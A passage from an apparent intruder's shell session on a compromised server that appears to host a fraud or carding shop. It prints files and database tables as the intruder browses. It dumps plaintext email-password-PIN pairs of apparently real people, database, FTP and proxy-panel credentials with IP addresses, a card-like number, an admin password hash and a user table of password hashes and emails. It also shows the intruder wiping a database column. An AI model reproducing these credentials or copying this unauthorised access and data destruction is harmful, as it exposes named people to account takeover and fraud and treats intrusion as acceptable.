Jan 26 2011 setup.exe +-rw-r--r-- 1 mmgen www 353781 Jan 26 2011 store.rar +-rw-r--r-- 1 mmgen www 74196 Jan 26 2011 title.gif +-rw-r--r-- 1 mmgen www 76765 Jan 26 2011 title_unreg.gif +-rw-r--r-- 1 mmgen www 2286399 Jan 26 2011 vorne.png +-rw-r--r-- 1 mmgen www 1087 Jan 26 2011 wrub4sts.lnk +# + +# cat passwords.txt +j_username=sny@vtxmail.ch +j_password=tino55 +pin=tino55 + +j_username=office@vertec-systems.com +j_password=121066 +pin= + + + + +j_username=DeineMutter@fickich.net +j_password=Diehuredie +pin=1234dudummestier + +j_username=HeyduFotze@magdich.net +j_password=ArschPo +pin=verarschmichnicht + +j_username=mybigmouth@web.de +j_password=andrea +pin=1950 + +j_username= +j_password= +pin= + +j_username=Rainer.Keberle@online.de +j_password=finepix4700 +pin= + +j_username=1746378 +j_password= +pin=q206mitte + + + +j_username=1746378 +j_password= +pin=q206mitte + +j_username=2187452 +j_password= +pin=q206mitte + +j_username=rababa@whitehouse.gov +j_password=dollar +pin=4711 + + + + +j_username=170734837 +j_password=express12 +pin= + +j_username=office@otto-stoeckl.com +j_password= +pin= + +j_username=170734837 +j_password=express +pin=12 + +j_username=nicole.dargel@gmx.de +j_password=Diving66 +pin= + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin=4449 + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin=4449 + +j_username=claudia.schultz@shell.com +j_password=chris1 +pin= + +j_username=734093 +j_password=19birgit +pin=7578 + +j_username=734093 +j_password=19nadine +pin=7578 + +j_username=734093 +j_password=birgit +pin=7578 + + + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username=Heldmann_C@web.de +j_password= +pin=6237 + +j_username=Heldmann_C@web.de +j_password= +pin=6237 + +j_username=benjamin.egermann@gmail.com +j_password=pcarmy +pin=6039 + +j_username=sabina.mastrogiovanni@gmx.de +j_password=2dU8yU9qY4aC +pin=5942 + +j_username= +j_password= +pin= + +j_username=danisahne8283@aol.com +j_password= +pin=masenfan + + +j_username=danisahne8282@aol.com +j_password=masenfan +pin=5556 + +j_username=danisahne8283@aol.com +j_password= +pin= + +j_username=danisahne8283@aol.com +j_password=masenfan +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + +j_username= +j_password= +pin= + + +j_username=hannesvw@gmail.com +j_password= +pin=9016 + + + + +j_username=Thomas.Wunder@hv-s.de +j_password=Mannheim +pin= + + +j_username=mail@obu-hamburg.de +j_password=obu2009 +pin= + +j_username=mail@obu-hamburg.de +j_password=2493 +pin= + +j_username=mail@obu-hamburg.de +j_password=OBU2009 +pin= + +j_username=31971258 +j_password= +pin=2493 + + + + + +j_username=mario.hoefler@web.de +j_password=nutpen10 +pin= + +j_username=E.Giegler@web.de +j_password=Eschen +pin=5115 + +j_username=E.Giegler@web.de +j_password=Eschen +pin=5115 + + +j_username=mail@obu-hamburg.de +j_password=obu2009 +pin=2394 + +# cat Data.txt +MySQL +https://91.213.8.13/myadmin/ +$host = localhost +$user = Palshop +$pass = u5AunWox +$data = morgen_Palshop + +FTP: +91.213.8.26 +morgen +2Rysb2Kv + +5socks +http://admin.5socks.net/ +Morgen +Kzmv7QkvIf + + +0458-8466-1325-4447 UVszBT <<<< 50?# + +# cd .. + +# cd .. + +# cd st0re.morgen.w2c.ru + +# ls -la +total 16 +drwxrwx--- 4 mmgen www 512 Dec 2 2010 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +drwxr-xr-x 5 mmgen www 512 Dec 2 2010 admin +drwxr-xr-x 8 mmgen www 512 Dec 3 2010 content + +# cd admin + +# ls -la +total 56 +drwxr-xr-x 5 mmgen www 512 Dec 2 2010 . +drwxrwx--- 4 mmgen www 512 Dec 2 2010 .. +-rw-r--r-- 1 mmgen www 8621 Dec 2 2010 DE.lng +-rw-r--r-- 1 mmgen www 1546 Dec 2 2010 admin.php +-rw-r--r-- 1 mmgen www 708 Dec 3 2010 config.php +drwxr-xr-x 3 mmgen www 512 Dec 2 2010 designe +-rw-r--r-- 1 mmgen www 1008 Dec 2 2010 functions.php +drwxr-xr-x 4 mmgen www 512 Dec 2 2010 img +-rw-r--r-- 1 mmgen www 876 Dec 3 2010 index.php +drwxr-xr-x 2 mmgen www 512 Dec 2 2010 pages + +# cat config.php + + +# cd /home/mmgen/st0re.cc + +# ls -la +total 1522696 +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 . +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. +-rw-r--r-- 1 mmgen www 16950051 Sep 13 01:08 1.mp3 +-rw-r--r-- 1 mmgen www 941752 Sep 30 16:19 2.rar +-rw-r--r-- 1 mmgen www 144694 Jan 30 2011 3.jpeg +-rw-r--r-- 1 mmgen www 760708777 Sep 13 00:58 4.rar +-rw-r--r-- 1 mmgen www 30654 Feb 22 2011 Banner.jpg +-rw-r--r-- 1 mmgen www 40505 Feb 7 2011 Banner4.jpg +-rw-r--r-- 1 mmgen www 13347 Feb 3 2011 Jelly.jpg +-rw-r--r-- 1 mmgen www 53943 Feb 3 2011 Kamagra.png +drwxr-xr-x 3 mmgen www 512 Feb 21 2011 Neu +drwxr-xr-x 3 mmgen www 512 Jun 2 18:52 Ref +-rw-r--r-- 1 mmgen www 8967 Jul 17 16:04 Ukash.php +-rw-r--r-- 1 mmgen www 4756 Jan 27 2011 account.php +-rw-r--r-- 1 mmgen www 1532 Jan 27 2011 account_do.php +-rw-r--r-- 1 mmgen www 978 Jan 27 2011 add_basket.php +drwxr-xr-x 7 mmgen www 512 Mar 10 2011 admin +-rw-r--r-- 1 mmgen www 164100 Apr 10 16:10 banner.gif +-rw-r--r-- 1 mmgen www 2398 Jan 28 2011 basket.php +-rw-r--r-- 1 mmgen www 11921 Jul 21 23:44 cashin.php +-rw-r--r-- 1 mmgen www 2278 Apr 9 18:00 category.php +-rw-r--r-- 1 mmgen www 5223 Mar 10 2011 cc_modul.php +-rw-r--r-- 1 mmgen www 2265 Feb 8 2011 checkout.php +-rw-r--r-- 1 mmgen www 1471 Jan 27 2011 error.php +-rw-r--r-- 1 mmgen www 1007 Jan 27 2011 faq.php +-rw-r--r-- 1 mmgen www 1406 Apr 18 12:49 favicon.ico +-rw-r--r-- 1 mmgen www 17594 Jan 27 2011 head.png +drwxr-xr-x 2 mmgen www 512 Aug 21 22:23 ico +-rw-r--r-- 1 mmgen www 7623 Jun 2 19:58 index.php +drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 libs +-rw-r--r-- 1 mmgen www 886 Jan 27 2011 login.php +-rw-r--r-- 1 mmgen www 1177 Jan 27 2011 login_do.php +-rw-r--r-- 1 mmgen www 164 Jan 27 2011 logout.php +-rw-r--r-- 1 mmgen www 1879 Jan 27 2011 product.php +-rw-r--r-- 1 mmgen www 1319 Jan 27 2011 register.php +-rw-r--r-- 1 mmgen www 1827 Jan 27 2011 register_do.php +drwxr-xr-x 3 mmgen www 512 May 17 03:21 style +-rw-r--r-- 1 mmgen www 8011 Apr 13 21:31 support.php +-rw-r--r-- 1 mmgen www 2417 Apr 13 21:31 support_do.php + +# cd admin + +# ls -la +total 268 +drwxr-xr-x 7 mmgen www 512 Mar 10 2011 . +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. +-rw-r--r-- 1 mmgen www 106 May 17 13:31 .htaccess +-rw-r--r-- 1 mmgen www 40 Jun 2 18:50 .htpasswd +-rw-r--r-- 1 mmgen www 8372 Feb 8 2011 category.php +drwxr-xr-x 2 mmgen www 512 Feb 8 2011 css +-rw-r--r-- 1 mmgen www 4599 Jan 27 2011 faq.php +drwxr-xr-x 6 mmgen www 512 Feb 8 2011 images +-rw-r--r-- 1 mmgen www 14618 Mar 10 2011 index.php +-rw-r--r-- 1 mmgen www 8549 Feb 13 2011 items.php +drwxr-xr-x 7 mmgen www 512 Feb 8 2011 js +drwxr-xr-x 3 mmgen www 512 Jan 27 2011 libs +-rw-r--r-- 1 mmgen www 7359 Mar 10 2011 modul.php +-rw-r--r-- 1 mmgen www 9007 Feb 8 2011 news.php +-rw-r--r-- 1 mmgen www 1256 Jan 27 2011 option.php +-rw-r--r-- 1 mmgen www 11703 Feb 8 2011 product.php +drwxr-xr-x 3 mmgen www 512 Jan 27 2011 style +-rw-r--r-- 1 mmgen www 18 Jan 29 2011 test.php +-rw-r--r-- 1 mmgen www 10040 Apr 9 19:18 tickets.php +-rw-r--r-- 1 mmgen www 12164 Feb 8 2011 user.php +-rw-r--r-- 1 mmgen www 17532 Feb 8 2011 voucher.php + +# cat .htaccess +AuthType Basic +AuthName "FUCK YOU" +AuthUserFile /home/mmgen/st0re.cc/admin/.htpasswd +Require valid-user + +# cat .htpasswd +Admin:$1$5KnX9ENu$aKqzHTLd5HpMqKqgnglUx/ + +# cd .. + +# cd libs + +# ls -la +total 56 +drwxr-xr-x 2 mmgen www 512 Apr 8 17:22 . +drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 .. +-rw-r--r-- 1 mmgen www 2757 Jan 27 2011 class_bbcode.php +-rw-r--r-- 1 mmgen www 1561 Jan 28 2011 class_user.php +-rw-r--r-- 1 mmgen www 227 Jun 2 18:20 mysql_config.php +-rw-r--r-- 1 mmgen www 1312 Apr 11 00:18 psc_cashin.class.php +-rw-r--r-- 1 mmgen www 4383 Jul 19 21:35 ukash_cashin.class.php +-rw-r--r-- 1 mmgen www 7679 Apr 8 17:21 xxx_psc_cashin.class.php +# cat mysql_config.php + + +So let's check out their SHOP DB + +# mysql -u mmgen_shop -D mmgen_shop -p +Enter password: +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 89332 +Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a + +Type 'help;' or '\h' for help. Type '\c' to clear the buffer. + +mysql> SHOW DATABASES; ++--------------------+ +| Database | ++--------------------+ +| information_schema | +| mmgen_shop | +| test | ++--------------------+ +3 rows in set (0.00 sec) + +mysql> SHOW TABLES; ++----------------------+ +| Tables_in_mmgen_shop | ++----------------------+ +| shop_basket | +| shop_ccmodul | +| shop_coupon | +| shop_faq | +| shop_items | +| shop_navigation | +| shop_news | +| shop_options | +| shop_orders | +| shop_products | +| shop_tickets | +| shop_user | +| shop_voucher | ++----------------------+ +13 rows in set (0.00 sec) + +mysql> # LOLOLO let's rm password info +mysql> UPDATE shop_voucher SET infos = ""; +Query OK, 11 rows affected (0.00 sec) +Rows matched: 11 Changed: 11 Warnings: 0 + +mysql> SELECT * FROM shop_voucher; ++-------+--------+------+---------------------+-------+-------+------------+ +| payid | userid | type | code | infos | value | date | ++-------+--------+------+---------------------+-------+-------+------------+ +| 1872 | 10522 | 1 | 0905-1066-3280-8205 | | 10 | 2011-09-30 | +| 1873 | 10522 | 1 | 0747-8763-8777-7583 | | 10 | 2011-09-30 | +| 1874 | 10482 | 1 | 0170-8844-2643-6121 | | 10 | 2011-09-30 | +| 1875 | 10161 | 1 | 0662-3887-5897-6736 | | 21 | 2011-09-30 | +| 1877 | 8885 | 1 | 0795-2181-5472-4078 | | 10 | 2011-09-30 | +| 1878 | 10575 | 1 | 0508-5218-3536-7066 | | 10 | 2011-09-30 | +| 1869 | 10568 | 1 | 0725-8889-7048-6149 | | 10 | 2011-09-30 | +| 1870 | 10300 | 1 | 0677-5871-1938-8696 | | 10 | 2011-09-30 | +| 1871 | 10557 | 1 | 0570-2670-2925-4453 | | 100 | 2011-09-30 | +| 1402 | 5356 | 0 | | | 0 | 2011-07-21 | +| 1403 | 9652 | 0 | | | 0 | 2011-07-21 | ++-------+--------+------+---------------------+-------+-------+------------+ +11 rows in set (0.00 sec) + +mysql> # Now how about we check who actually buys shit +mysql> SELECT * FROM shop_user WHERE credits > 5; ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +| userid | username | password | icq | credits | status | x | ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +| 6 | J0hn.X3r | dbd570d9cfb7ee0473a7890e641a1f45 | 898437 | 20 | 0 | 0 | +| 189 | Arma | 93f5d2a618cde4160d3eb8f748221f91 | arma@hush.ai | 10 | 0 | 0 | +| 208 | iron.t | 9b630edecc947a5f9e5d4ca59462663f | iron.t@hotbo | 15 | 0 | 0 | +| 514 | ngized | 3dcbb61d6599e4cbe89510c28f324f66 | camora18@web | 10 | 0 | 0 | +| 571 | basha | 1618a9fe1c58f2bedd2fdccefaa6da21 | basha444@web | 9 | 0 | 0 | +| 625 | stefgexp | 55132608a2fb68816bcd3d1caeafc933 | c.k.007@web. | 40 | 0 | 0 | +| 794 | Tanoths | b5042eac66b4bdb8c6e42560f964ed3c | max@lilium-n | 23 | 0 | 0 | +| 804 | TB4ever | 4be5ce67d73fb9b6dda4d91d45387d16 | jjstyler@liv | 7 | 0 | 0 | +| 945 | Sven | 3dd19f98fd4adb12e6cee669341381aa | vb-sveiven@w | 10 | 0 | 0 | +| 973 | binglly | 1a7384005bd77b151e11d58ac79da095 | binglly@web. | 10 | 0 | 0 | +| 1120 | etrax | 4f0cb9262f0a0fdab6c9db4c122024c2 | etrax@secure | 10 | 0 | 0 | +| 1174 | JUMPhil | 40d914022aca12c372304e1cf2e89b88 | 836499 | 9 | 0 | 0 | +| 1195 | m0rpheus | 06aa90cb7e31b1de837cdfd4b837163c | m0rpheusz@o2 | 10 | 0 | 0 | +| 1207 | HansMeier | 44354626326b1cd44cce845e8393ac0d | hansmeierfor | 6 | 0 | 0 | +| 1353 | dr.mouse | b5ba41ed05b0b197546e2a4283af77ae | gucci23@hush | 7 | 0 | 0 | +| 1691 | play | 0c2192030b08d26b06b073eef083548a | b4252353@ugg | 17 | 0 | 0 | +| 1771 | fros | e0e93346794bf614a1f02254d9d8b21e | ritho.ritho@ | 10 | 0 | 0 | +| 1810 | melvyn10 | 41df744f22aa3d7f81983a77e2899829 | melvyn10@081 | 15 | 0 | 0 | +| 1941 | phyntox | 33d42d1eb34ec443704571b0ce34193e | phyntox@goog | 10 | 0 | 0 | +| 1967 | fatal | 592b36d730c592cce0eebe1731d143ec | fatal3x@live | 7 | 0 | 0 | +| 2010 | Dodo | d6d963cedb8dbc1ee57f271e942fbadd | bennibluemch | 7 | 0 | 0 | +| 2301 | Blizzardo | 15b29ffdce66e10527a65bc6d71ad94d | blizzardfert | 10 | 0 | 0 | +| 2415 | ecstasy | 887e1733037e9af10502b8bf923ad202 | Riehm93@onli | 6 | 0 | 0 | +| 2478 | basics | cf7303a964a1682deeb3db90fbe3aeab | admin@mail-s | 6 | 0 | 0 | +| 2630 | Stehlampe | db1527f7ecd3dd38f5de94e38cae2c53 | waswillstdud | 20 | 0 | 0 | +| 2641 | mettwurst | 245a93ee61572bdda20c145374192603 | mettwurst@sa | 8 | 0 | 0 | +| 2677 | Syntax | 068d03ef735f14d75cd78d0ad5e427a3 | psych0tik@li | 13 | 0 | | +| 2696 | seife123 | a2327b1893edf0719cc1f29b8d807957 | azzzze@yahoo | 10 | 0 | 0 | +| 2703 | fam0us | 8f036369a5cd26454949e594fb9e0a2d | ifam0us@hotm | 20 | 0 | 0 | +| 2731 | Borni81 | 8d8e4a0f1607ecb8790bce4d03331749 | bornito@live | 6 | 0 | 0 | +| 2763 | termi | 573bd983f1a92bb6cf8b535919e3a728 | Hans.olaf1@w | 6 | 0 | 0 | +| 2827 | O.M.A. | 6b8d556a2c4e1a17c57c4019d58377f7 | Mueller_Simo | 7 | 0 | 0 | +| 2861 | Epicfisch | 5785adb4d56e4dd0e2732c26ccc3a0ca | admin@stream | 10 | 0 | 0 | +| 2960 | daunilein | 0e1ffc254643ad1b3a006a347146282f | downi@downi. | 6 | 0 | 0 | +| 3101 | Pr3dator | 65a5a3d88782ceb6af221234670ec8fb | christian.ri | 13 | 0 | 0 | +| 3135 | hassan3 | 8ce4ffbdd4b371c255be75734f26cd72 | guzter@ahoo. | 10 | 0 | 0 | +| 3208 | maddox | 4a3ef4824d67af46ea57a39b72dea7df | a3351613@owl | 8 | 0 | 0 | +| 3256 | k00ky | 649f7f3295eb1163604ce906b6a6c498 | k00ky@hotmai | 9 | 0 | 0 | +| 3266 | 1337man | f29f5f0849fec2e6bc1c10de788410fa | roflfastlola | 11 | 0 | 0 | +| 3321 | djinns | c316236440037c0a621d592222708b72 | djinnsrs@goo | 8 | 0 | 0 | +| 3433 | fluxay | 64d1f88b9b276aece4b0edcc25b7a434 | dir@mailinat | 70 | 0 | 0 | +| 3628 | BOMBER | 8e26756ab1075b72dd82965c3d67c162 | bersch5555@w | 6 | 0 | 0 | +| 3731 | testuser0 | 68b62823ed173ad3bed0ce700d556b2a | b999347@owlp | 25 | 0 | 0 | +| 3829 | Skywalker | 077efa5fc07874cb04bd359845314743 | b1459562@owl | 10 | 0 | 0 | +| 3905 | Plasmasmog | ba9912907e468a911de722cd811b99b2 | Plasmasmog@m | 10 | 0 | 0 | +| 3951 | master1234 | bffdd53cd1557a14c84b6f42f2012187 | forfreemovie | 10 | 0 | 0 | +| 4038 | !XSS | 5b84d7e9450f523d263a1e2844d333da | xss-xss@Safe | 17 | 0 | 0 | +| 4114 | sh0x | 7e573aedbe6d321228de54fcacee7ebd | leandroking@ | 6 | 0 | 0 | +| 4121 | slice | c53c7a272390264c5e6beddcc410daa5 | esel@yahoo.d | 10 | 0 | 0 | +| 4140 | Dennske | f8eb6ce796e56b0260d9e77c6e057a20 | wccrew@web.d | 10 | 0 | 0 | +| 4144 | -Bounter- | 2fec358d161f20e1d51e24641d76312f | dreamy@warez | 10 | 0 | 0 | +| 4470 | Phantonym | 95abaa72bd229ec8f058519bb4bcfe87 | Phantonym@hu | 11 | 0 | 0 | +| 4474 | CyberTT | df53ca268240ca76670c8566ee54568a | a1679852@bof | 6 | 0 | 0 | +| 4476 | Getter | 530ea1472e71035353d32d341ecf6343 | a1682682@bof | 50 | 0 | 0 | +| 4808 | ceres2 | dd4df322be3679fc422ab3d45fc97e96 | ceres@imails | 13 | 0 | 0 | +| 4846 | check | 3756dd32ed2706bb3b6fc004b0e4ef80 | senmobiles@h | 8 | 0 | 0 | +| 4890 | lgdavid | 5daec48bdfda7423e079b99c80c13ed1 | david.wang20 | 7 | 0 | 0 | +| 4919 | stronger87 | ea110dfdeb4b966c81f7d786df7b1192 | dirkbischof@ | 10 | 0 | 0 | +| 4944 | burberry | 55f9c405bd87ba23896f34011ffce8da | burberry1337 | 6 | 0 | 0 | +| 5088 | L4x1337 | 7518f76db987755dbb01c52e177ba134 | 591238155 | 8 | 0 | 0 | +| 5126 | Neon | ab64f71b84891bc31fe85512d35716a8 | neon19881@we | 10 | 0 | 0 | +| 5401 | schlecker | cf14f069b4e041d13f50361dd54b9a33 | sjsj@web.de | 8 | 0 | 0 | +| 5446 | sexy1337 | e10adc3949ba59abbe56e057f20f883e | sadsadasdmer | 9 | 0 | 0 | +| 5642 | firelabs | 076c91ca1a80a49970a3e094ef5954cf | fuckthatbitc | 10 | 0 | 0 | +| 5727 | 2t-power | 0df174153bd462f50c728006d9d1c704 | eiermann@hus | 6 | 0 | 0 | +| 6079 | pete | 620209aea87f7bae2bd2445d094ba275 | karl-otto3@w | 20 | 0 | 0 | +| 6092 | accored | bc47508edab07c1a0082c714fdc08eab | acc0r3d@yaho | 18 | 0 | 0 | +| 6167 | mercury | 98169b656c826331d6e9d5e334ca7be8 | fakemail@bla | 10 | 0 | 0 | +| 6183 | Roxas | d412a68fd7624bfe220f55f53c26f5a7 | Roxas_1991@g | 20 | 0 | 0 | +| 6187 | Redbullfly | 3a82ca9ca9bfe5db9d9eda406c13ac61 | Redbullfly@g | 8 | 0 | 0 | +| 6263 | Madd1n | e2a2a6d692a27773a9da52f7e82cfde7 | martinkieser | 6 | 0 | 0 | +| 6465 | terror | 9a1b0d5d2d14b7272183d51fe5914f25 | b1245111@lhs | 12 | 0 | 0 | +| 6549 | drupp | e19d5cd5af0378da05f63f891c7467af | drupp88@goog | 53 | 0 | 0 | +| 6590 | _wayne | dc8996397be86e49cb56fd6face00c7f | mkoch@live.d | 6 | 0 | 0 | +| 6667 | krillewurm | 06e0274429fc435c0335237c0006f13c | easy-riderz@ | 25 | 0 | 0 | +| 6689 | sundy | 263f55f9f491876ebe21af13c2ee4589 | ra.klaus.sta | 7 | 0 | 0 | +| 6772 | 1311 | 2aed094745c811516aea636e52015bc8 | 2010@9y.com | 10 | 0 | 0 | +| 6820 | drbob | edfff284ca91b5676d8caa85f0cfd1df | BlackDesire2 | 20 | 0 | 0 | +| 6885 | Lankabel | 4297f44b13955235245b2497399d7a93 | 123@123.123 | 35 | 0 | | +| 6953 | fr34c10 | 200820e3227815ed1756a6b531e7e0d2 | festner@mail | 10 | 0 | | +| 7040 | Cysis | 984c8c7b5d1d358c1470b1a2f81cdd3b | 4216SD@gmail | 40 | 0 | | +| 7042 | Fire | e94e346e5bb49449d6d607939ddbf63c | cyler@hotmai | 8 | 0 | | +| 7072 | drbob100 | 8faddb27516de448b4f7a434b5a7130a | Blackddeess@ | 20 | 0 | | +| 7105 | runner91 | 8a7d489dbea2c6d8ad710b47ea68bc05 | malli-2006@w | 7.5 | 0 | | +| 7190 | jacov | f30d05ead11bea743d583e4282e304f6 | n0b0dy.fh@we | 7 | 0 | | +| 7193 | kratos1 | 59779937922f0264885e4f871257be48 | fgikto@googl | 7 | 0 | | +| 7227 | s30s | 5103c1995af9f7fc6751de332bcfdfd3 | xc0ree@cust. | 7 | 0 | | +| 7603 | fws | 73cb82e5496bfc9e4a6bc70ea2826e56 | ao@f-ws.de | 32 | 0 | | +| 7803 | CodeRed | e89b7c5cc238c5871ceeafe46d3d3154 | CodeRed94@ho | 6 | 0 | | +| 7827 | liviu | 65399351c23e646ae6ad68c938015c14 | zut@wet.de | 6 | 0 | | +| 7887 | Anything | 9f4633f632153c74bcddcbf9c1d2fbed | 113377 | 9 | 0 | | +| 7899 | piren20 | cc03e747a6afbbcbf8be7668acfebee5 | mh.zeh@web.d | 10 | 0 | | +| 7925 | sdffsf | c02711d20a521eb8d1e5aeefb6bbecab | dfds@sd.de | 7 | 0 | | +| 8114 | sTiNN | 745c0ccdb25262e3a17afe9fd6456a5c | stinn@live.d | 6 | 0 | | +| 8122 | bigdady | 9933fb405b690fb59015b8981e09e671 | 621178350 | 10 | 0 | | +| 8249 | freestyl | 2968da776da97fdd7d4910189411804e | as7da9d@gmx. | 20 | 0 | | +| 8324 | kamel | e73e1bd2feb22b75c0ec0cacfd0b9d25 | 81023871 | 13 | 0 | | +| 8340 | iphonejumper | 5db9e40fd1ae010e435884cedbfde349 | | 7 | 0 | | +| 8408 | joe321 | f36e8a3b77970d55a984672972555c40 | | 35 | 0 | | +| 8414 | Crackfox | 10b43971a8295f3720f38fbcdd9d6ac6 | | 6 | 0 | | +| 8470 | shoxx12 | 1e45690858e3dfdeebbd67eb5db2653b | | 5.5 | 0 | | +| 8493 | alexander | dd22141acb5ea065acd5ed773729c98f | 000000 | 30 | 0 | | +| 8554 | hurens0hn | 08ba21f5a9f192e3114ce9c3d29c0f8f | 383051368 | 25 | 0 | | +| 8580 | Bester12 | 8e2a99e1e5e356f5b9b874c8d9d83c79 | 456 | 40 | 0 | | +| 8627 | Kleedyyy | 8d0c8f9d1a9539021fda006427b993b9 | | 7 | 0 | | +| 8645 | Energie | ea110dfdeb4b966c81f7d786df7b1192 | | 7 | 0 | | +| 8691 | JimPanse | f56a8901702b2c279c065f2ca15890ec | | 8 | 0 | | +| 8744 | cubee | 4a3ef4824d67af46ea57a39b72dea7df | | 7 | 0 | | +| 8762 | Dodel | 5657c76ad9a05ea0d9899f94dc4121e9 | | 8 | 0 | | +| 8826 | kuni77 | 22f3555c832cde0134c65e9cb44424ee | 615664295 | 7 | 0 | | +| 8866 | sysfuck | 95a3d9c2bce545f46bc54d8a750438b1 | | 17.5 | 0 | | +| 8879 | payment | ed8539ed5fe17d4dc3a18058831fb9bd | | 10 | 0 | | +| 8890 | PolskaDumny | c288a40b22e236022e43f96cf7bab952 | 165-034 | 8.5 | 0 | | +| 8933 | Dubstep | 3116ccacabe066ce091b171347fca80d | 427-073-373 | 25.2 | 0 | | +| 8960 | Hotter | 0981ee032a8e8af483dc24390916c737 | 282979840 | 7.5 | 0 | | +| 8969 | network44 | 44252cf93dd7a73ecc031f8363a26459 | 618445 | 10 | 0 | | +| 9010 | sey | f2f6ca16e070070fc5465ab4209586b5 | | 10 | 0 | | +| 9094 | MrPataa | 9c7b04e137048c6dc5bc2dae0f78bf68 | | 10 | 0 | | +| 9122 | Semtex99 | 9ca40c627bb00f08347cf336fb09011b | | 9 | 0 | | +| 9183 | trainee | a2147086850706ecb2b6f2919fed8e40 | 350610 | 7 | 0 | | +| 9216 | opfa | 01fc7192adba9cbba78b612ebeca6b66 | | 11 | 0 | | +| 9223 | ivory | 00b86e77b9f76fc1f466555b6af345f8 | | 10 | 0 | | +| 9253 | blur121 | 7e4ea1bf5ca4e36d14e6296e485970f2 | | 10 | 0 | | +| 9590 | kani2012 | ec11aacc5832b63f02f1269e89d3cdd7 | 858223 | 7 | 0 | | +| 9269 | drm1hy | c6cb19878e6a335d4fabb115ca8e3605 | | 24 | 0 | | +| 9273 | TrOvEjAr | 9378884c5f76bf23f5aaedd1035017ba | 234307423 | 20 | 0 | | +| 9275 | gist505 | fcdd4eae6aff919545ff68b6e3943b91 | | 8.98 | 0 | | +| 9298 | mrgreen | 824a67f29e97b8798a9df7f00189f3e1 | | 35 | 0 | | +| 9307 | GStar | 2472ee727ed8de9a818fc657a6895646 | | 10 | 0 | | +| 9310 | Domi93 | b36d331451a61eb2d76860e00c347396 | | 8 | 0 | | +| 9348 | pwned | 530ea1472e71035353d32d341ecf6343 | | 6.5 | 0 | | +| 9357 | darkt0wn | a56b6119d6c8be8e2d0d25bcfdca25c6 | | 10 | 0 | | +| 9375 | optik | d6ae345d39ca27dcc9c8e9c30a814041 | | 7 | 0 | | +| 9397 | U3 | 93327f2856df1105a1318895ac44e684 | 645458882 | 20.2 | 0 | | +| 9410 | mule22 | d27c8e6c3222ea5da09eb7f0f9d56818 | | 7 | 0 | | +| 9448 | BL4cKKS | cdbec512b7a848722346013aa3e44f8b | | 7 | 0 | | +| 9508 | PEPPEP | 6ec176f463121c7a1fc2f442ba22e937 | | 6 | 0 | | +| 9534 | Cardercc | 461ae6b500f5802d4d52b34643cdcc6e | | 11 | 0 | | +| 9599 | nolandro | 78f5cf8d0ee4f6b1e612a36954c1254d | | 50 | 0 | | +| 9600 | KoKaiiiN | dc74e595f9938b1ea1f1a078ae154949 | 363727670 | 6 | 0 | | +| 9618 | D3DMan | e78e0c9c18a6490ef56c3ffe837e0fca | | 10.5 | 0 | | +| 9621 | Abdulleben | 25d55ad283aa400af464c76d713c07ad | | 6.5 | 0 | | +| 9631 | sexonthebeach | 2dfbaaecbe98198ace8c554cc426b6d4 | | 44 | 0 | | +| 9701 | heiko4321 | 12a6265a271b7b23e943f5986d80d190 | | 7.5 | 0 | | +| 9726 | albozz | d41d8cd98f00b204e9800998ecf8427e | | 18 | 0 | | +| 9729 | Spexti | 4dfd9542414fed623b432aee923618d0 | | 6 | 0 | | +| 9791 | Bastler | a278ec2edc9105bd52fe62254522ecd4 | | 20 | 0 | | +| 9820 | vima | f3674879f5e18c7989e02235da302cc9 | | 20 | 0 | | +| 9822 | xNiightx | ef605602b07ae6b27054649d92e28b3e | 474300093 | 19 | 0 | | +| 9824 | bergwerk | c4fd4f3a6e0f9ccbc309a510a7efbad4 | | 12 | 0 | | +| 9948 | funny333 | 56a876cce8c5d91ed47db1b742573d36 | | 17.5 | 0 | | +| 9966 | Friedrich | 28acec923aa820ebbe028955a5a46356 | ja | 7 | 0 | | +| 10035 | Auzodiox | 286119328282d5d64cf1a3a02aba6316 | | 15 | 0 | | +| 10003 | donjuan | 6d11921056f42e148b13a528c82d174e | | 5.5 | 0 | | +| 10005 | hajo22 | 566a1fc42bc3fa17a3920221d2b24d34 | | 6 | 0 | | +| 10032 | golem | 62650cd9a5fb136dc137b155e4ae6f2a | | 15.5 | 0 | | +| 10033 | blood | 42ee64c24d1efcc4c1916074461854f3 | | 10 | 0 | | +| 10051 | Technoboom | 77711870d494d022654bcf842b603467 | | 7 | 0 | | +| 10217 | LiBeRtY1338 | d41d8cd98f00b204e9800998ecf8427e | 634365955 | 9.1 | 0 | | +| 10085 | mo100 | 7cc5a8be611ccce374885048bc2a4848 | | 32.5 | 0 | | +| 10575 | Twix2010 | 75a593a34aa5ba8e5e5788b7c899802e | | 7 | 0 | | +| 10216 | Spagel | 22243bfba05b9715e6303dacf7f66c90 | | 30 | 0 | | +| 10391 | DerHase | e99a18c428cb38d5f260853678922e03 | | 7.5 | 0 | | +| 10290 | samsamsam3 | 